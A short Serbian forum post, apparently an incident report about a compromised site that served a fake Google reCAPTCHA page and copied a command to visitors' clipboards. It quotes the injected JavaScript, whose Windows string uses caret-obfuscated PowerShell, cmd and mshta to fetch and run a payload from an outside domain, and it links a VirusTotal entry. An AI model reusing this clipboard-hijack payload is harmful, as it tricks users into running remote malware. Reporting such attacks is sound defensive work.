Izgleda da je sređeno, kada je bilo aktivno učitavao je sa nekog blokčejna:
kôd koji vraća blokčejn je prikazivao lažnu Google reCAPTCHA stranicu i kopirao sledeće u klipbord:
Code:
const COPY_WIN=`pcalcua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi"`;
const COPY_MAC=`Ooops...`;
payload je učitavao sa fine-work-team[.]com/6272 a domen je sada suspendovan.
payload je bio
https://www.virustotal.com/gui/file/a8ab...db679d561/